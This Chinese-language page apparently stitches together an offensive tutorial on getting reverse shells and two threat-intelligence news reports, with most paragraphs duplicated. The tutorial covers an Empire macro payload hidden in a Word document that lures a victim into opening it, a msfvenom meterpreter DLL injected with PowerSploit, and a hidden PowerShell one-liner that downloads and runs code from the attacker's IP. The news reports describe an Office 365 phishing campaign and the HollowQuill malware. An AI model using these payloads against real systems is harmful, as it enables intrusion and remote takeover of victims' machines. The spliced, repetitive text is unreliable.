利用office 宏反弹shell
攻击者(192.168.159.134)开启监听:
uselistener http
execute
back
usestager windows/macro http #生成payload
execute
生成/tmp/macro 攻击代码后,新建一个word 创建宏
攻击者(192.168.159.134)开启监听:
uselistener http
execute
back
usestager windows/macro http #生成payload
execute
生成/tmp/macro 攻击代码后,新建一个word 创建宏
点击“文件”-“宏”-“创建”,删除自带的脚本,复制进去/tmp/macro文件内容,并保存为“Word 97-2003文档(.doc)”或者“启用宏的Word 文档(.docm)”文件,当诱导目标打开,执行宏后,即可成功反弹shell:
说明:需要开启宏或者用户手动启用宏。开启宏设置:“文件”-“选项”-“信任中心”,选择“启用所有宏”
说明:需要开启宏或者用户手动启用宏。开启宏设置:“文件”-“选项”-“信任中心”,选择“启用所有宏”
在word中“插入”-“对象”-“由文件创建” 处,插入launcher.bat文件,可更改文件名称和图标,进行伪装,当诱导目标点击launcher_lltest.xls文件,执行后,即可成功反弹shell
PowerSploit DLL注入反弹shell
PowerSploit是又一款基于powershell的后渗透攻击框架。PowerSploit包括Inject-Dll(注入dll到指定进程)、Inject-Shellcode(注入shellcode到执行进程)等功能。
利用msfvenom、metasploit和PowerSploit中的Invoke-DllInjection.ps1 实现dll注入,反弹shell
1)msfvenom生成dll后门
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.159.134 lport=6667 -f dll -o /var/www/html/PowerSploit/lltest.dll
说明:目标机64位 用x64 ; 32位的话用windows/meterpreter/reverse_tcp
metasploit 设置payload 开启监听
use exploit/multi/handler
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST 192.168.159.134
set LPORT 6667
exploit
PowerSploit是又一款基于powershell的后渗透攻击框架。PowerSploit包括Inject-Dll(注入dll到指定进程)、Inject-Shellcode(注入shellcode到执行进程)等功能。
利用msfvenom、metasploit和PowerSploit中的Invoke-DllInjection.ps1 实现dll注入,反弹shell
1)msfvenom生成dll后门
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.159.134 lport=6667 -f dll -o /var/www/html/PowerSploit/lltest.dll
说明:目标机64位 用x64 ; 32位的话用windows/meterpreter/reverse_tcp
metasploit 设置payload 开启监听
use exploit/multi/handler
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST 192.168.159.134
set LPORT 6667
exploit
metasploit反弹shell
利用metasploit的web_delivery模块可通过python、php、powershell、regsvr32等进行反弹shell
攻击者(192.168.159.134)
利用metasploit的web_delivery模块可通过python、php、powershell、regsvr32等进行反弹shell
攻击者(192.168.159.134)
目标机执行powershell payload:
powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://192.168.159.134:83/a'))"
6)成功反弹shell后,右键interact 进入shell
powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://192.168.159.134:83/a'))"
6)成功反弹shell后,右键interact 进入shell
邮件攻击再升级:Microsoft Office 365 用户面临凭据窃取与恶意软件双重危机
一场复杂的网络攻击活动已经出现,攻击者采用双重威胁手段,既能同时窃取 Microsoft Office 365 的凭据,又能将恶意软件传递给毫无防备的受害者。
这种混合攻击始于伪装成来自合法文件共享服务的文件删除提醒的欺骗性电子邮件,营造出一种虚假的紧迫感,促使用户立即采取行动以保存所谓的重要文件。
此次攻击巧妙地利用了用户的信任,将合法的云存储平台 files.fm 作为其初始传播机制。
收件人会收到有关即将删除文件的警告,邮件主题行提及商业文件,促使他们点击超链接的文档名称,这些链接会将他们引导至真实的 files.fm 页面。
这种方式极大地提高了攻击的可信度,因为在感染链的早期阶段,用户是在与一个真实的文件共享服务进行交互。
Cofense 网络钓鱼防御中心(PDC)的研究人员发现了这一攻击活动,并指出了其特别阴险的 “二选一” 攻击方式。
在下载并打开共享的 PDF 文件后,用户会面临两个看似无害的选项:“预览” 或 “下载”—— 而每个选项都会导致不同但同样具有破坏性的后果。
这种分叉式的攻击路径通过提供多种入侵途径,将攻击成功率最大化。
当用户选择 “预览” 时,凭据窃取组件就会启动。这一操作会将受害者重定向到一个看似可信但实则欺诈的 Microsoft 登录页面,该页面与真实的 Microsoft 登录界面极为相似。
虽然该页面具有人们熟悉的 Microsoft 品牌元素,但也包含一些细微的不一致之处,比如非 Microsoft 域名的网址。
然而,这些警示信号在当时往往会被忽视,当用户尝试进行身份验证时,就会导致凭据被盗。
另一方面,选择 “下载” 则会触发伪装成 “SecuredOneDrive.ClientSetup.exe” 的恶意软件的安装。
这个可执行文件伪装成合法的 Microsoft 软件,而实际上会部署 ConnectWise 远程访问木马(ConnectWise RAT),这是一种恶意工具,它利用合法的远程管理软件来实现未经授权的系统访问。
一场复杂的网络攻击活动已经出现,攻击者采用双重威胁手段,既能同时窃取 Microsoft Office 365 的凭据,又能将恶意软件传递给毫无防备的受害者。
这种混合攻击始于伪装成来自合法文件共享服务的文件删除提醒的欺骗性电子邮件,营造出一种虚假的紧迫感,促使用户立即采取行动以保存所谓的重要文件。
此次攻击巧妙地利用了用户的信任,将合法的云存储平台 files.fm 作为其初始传播机制。
收件人会收到有关即将删除文件的警告,邮件主题行提及商业文件,促使他们点击超链接的文档名称,这些链接会将他们引导至真实的 files.fm 页面。
这种方式极大地提高了攻击的可信度,因为在感染链的早期阶段,用户是在与一个真实的文件共享服务进行交互。
Cofense 网络钓鱼防御中心(PDC)的研究人员发现了这一攻击活动,并指出了其特别阴险的 “二选一” 攻击方式。
在下载并打开共享的 PDF 文件后,用户会面临两个看似无害的选项:“预览” 或 “下载”—— 而每个选项都会导致不同但同样具有破坏性的后果。
这种分叉式的攻击路径通过提供多种入侵途径,将攻击成功率最大化。
当用户选择 “预览” 时,凭据窃取组件就会启动。这一操作会将受害者重定向到一个看似可信但实则欺诈的 Microsoft 登录页面,该页面与真实的 Microsoft 登录界面极为相似。
虽然该页面具有人们熟悉的 Microsoft 品牌元素,但也包含一些细微的不一致之处,比如非 Microsoft 域名的网址。
然而,这些警示信号在当时往往会被忽视,当用户尝试进行身份验证时,就会导致凭据被盗。
另一方面,选择 “下载” 则会触发伪装成 “SecuredOneDrive.ClientSetup.exe” 的恶意软件的安装。
这个可执行文件伪装成合法的 Microsoft 软件,而实际上会部署 ConnectWise 远程访问木马(ConnectWise RAT),这是一种恶意工具,它利用合法的远程管理软件来实现未经授权的系统访问。
HollowQuill 恶意软件: 利用 PDF 文档威胁政府以及学术机构安全
一场被称为 HollowQuill 的复杂恶意软件攻击活动,已成为对全球学术机构和政府机构的重大威胁。
此次攻击利用了经过伪装的恶意 PDF 文档,这些文档伪装成研究论文、科研经费申请或政府官方文件,诱使毫无防备的受害者启动感染链。
该恶意软件采用了先进的社会工程学策略来提高其攻击成功率,制作出令人信服的诱饵文档,即使是具备安全意识的用户也会认为这些文档是合法的。
一旦打开,这些看似无害的 PDF 文件就会触发一个复杂的多阶段感染过程,该过程旨在躲避检测的同时实现持续驻留。
Broadcom 的分析师们认为,这一攻击活动特别值得关注,因为其具有针对性,并且采用了复杂的规避检测技术。
他们的研究表明,攻击者很可能是出于间谍活动的目的,在追寻政府和学术机构的敏感数据。
这次攻击展示出了极高的技术复杂性,首先是分发包含一个基于.NET 的恶意软件释放器的恶意 RAR 压缩档案。
这一初始的入侵行为会导致部署多个恶意负载,其中包括一个合法的 OneDrive 应用程序,该程序可帮助恶意软件混入正常的系统操作中。
一场被称为 HollowQuill 的复杂恶意软件攻击活动,已成为对全球学术机构和政府机构的重大威胁。
此次攻击利用了经过伪装的恶意 PDF 文档,这些文档伪装成研究论文、科研经费申请或政府官方文件,诱使毫无防备的受害者启动感染链。
该恶意软件采用了先进的社会工程学策略来提高其攻击成功率,制作出令人信服的诱饵文档,即使是具备安全意识的用户也会认为这些文档是合法的。
一旦打开,这些看似无害的 PDF 文件就会触发一个复杂的多阶段感染过程,该过程旨在躲避检测的同时实现持续驻留。
Broadcom 的分析师们认为,这一攻击活动特别值得关注,因为其具有针对性,并且采用了复杂的规避检测技术。
他们的研究表明,攻击者很可能是出于间谍活动的目的,在追寻政府和学术机构的敏感数据。
这次攻击展示出了极高的技术复杂性,首先是分发包含一个基于.NET 的恶意软件释放器的恶意 RAR 压缩档案。
这一初始的入侵行为会导致部署多个恶意负载,其中包括一个合法的 OneDrive 应用程序,该程序可帮助恶意软件混入正常的系统操作中。
HollowQuill 恶意软件利用 PDF 文档攻击全球政府机构
网络威胁日益严重,令人不安的是,一种名为“HollowQuill”的新型恶意软件被发现针对全球学术机构和政府机构。
这次复杂的攻击利用武器化的 PDF 文档渗透系统,结合使用社会工程学和先进的恶意软件部署技术来绕过传统的安全措施。
攻击剖析:社会工程学与恶意软件
攻击始于分发看似合法的 PDF 文档,这些文档伪装成研究论文、拨款申请或政府官方信函。
这些 PDF 经过精心制作,旨在吸引收件人,利用对学术和政府来源的信任。
一旦打开,该文件就会释放多阶段感染链。
它首先执行包含 .NET 恶意软件植入器的恶意 RAR 存档,然后部署多个有效载荷:
合法的 OneDrive 应用程序,可能被用作社会工程策略的一部分来验证初始下载。
基于 Golang 的 shellcode 加载器,由于采用 Golang(一种与恶意软件关联较少的语言)进行编程,因此可以逃避传统防病毒程序的检测。
诱饵 PDF 文件,旨在提供一种虚假的安全感或分散注意力的感觉。
威胁指标
赛门铁克一直处于领先地位,提供针对此类威胁的强大保护:
防病毒与云集成:赛门铁克的防病毒套件现已包含基于自适应的防护功能,可拦截由 ACM.Untrst-FlPst!g1 识别的恶意文件。此外,VMware Carbon Black 产品已配置为阻止已知、可疑和潜在有害程序的执行,同时还与云服务集成,使用“已知恶意软件”、“可疑恶意软件”和“PUP”等策略进行实时分析。
电子邮件安全:通过赛门铁克的电子邮件安全产品来应对基于电子邮件的威胁,其中电子邮件威胁隔离 (ETI) 可提供针对基于 Web 的攻击的额外安全层。
基于文件的威胁:该恶意软件在各种标签下被检测到,包括 Trojan.Gen.MBT 和 WS.Malware.1,并使用机器学习模型(例如 Heur.AdvML.A!300 到 Heur.AdvML.C)来尽早识别和防止感染。
Web 保护:利用支持 WebPulse 的产品,赛门铁克确保将观察到的域和 IP 归类到安全类别下,以便主动缓解 Web 威胁。
网络威胁日益严重,令人不安的是,一种名为“HollowQuill”的新型恶意软件被发现针对全球学术机构和政府机构。
这次复杂的攻击利用武器化的 PDF 文档渗透系统,结合使用社会工程学和先进的恶意软件部署技术来绕过传统的安全措施。
攻击剖析:社会工程学与恶意软件
攻击始于分发看似合法的 PDF 文档,这些文档伪装成研究论文、拨款申请或政府官方信函。
这些 PDF 经过精心制作,旨在吸引收件人,利用对学术和政府来源的信任。
一旦打开,该文件就会释放多阶段感染链。
它首先执行包含 .NET 恶意软件植入器的恶意 RAR 存档,然后部署多个有效载荷:
合法的 OneDrive 应用程序,可能被用作社会工程策略的一部分来验证初始下载。
基于 Golang 的 shellcode 加载器,由于采用 Golang(一种与恶意软件关联较少的语言)进行编程,因此可以逃避传统防病毒程序的检测。
诱饵 PDF 文件,旨在提供一种虚假的安全感或分散注意力的感觉。
威胁指标
赛门铁克一直处于领先地位,提供针对此类威胁的强大保护:
防病毒与云集成:赛门铁克的防病毒套件现已包含基于自适应的防护功能,可拦截由 ACM.Untrst-FlPst!g1 识别的恶意文件。此外,VMware Carbon Black 产品已配置为阻止已知、可疑和潜在有害程序的执行,同时还与云服务集成,使用“已知恶意软件”、“可疑恶意软件”和“PUP”等策略进行实时分析。
电子邮件安全:通过赛门铁克的电子邮件安全产品来应对基于电子邮件的威胁,其中电子邮件威胁隔离 (ETI) 可提供针对基于 Web 的攻击的额外安全层。
基于文件的威胁:该恶意软件在各种标签下被检测到,包括 Trojan.Gen.MBT 和 WS.Malware.1,并使用机器学习模型(例如 Heur.AdvML.A!300 到 Heur.AdvML.C)来尽早识别和防止感染。
Web 保护:利用支持 WebPulse 的产品,赛门铁克确保将观察到的域和 IP 归类到安全类别下,以便主动缓解 Web 威胁。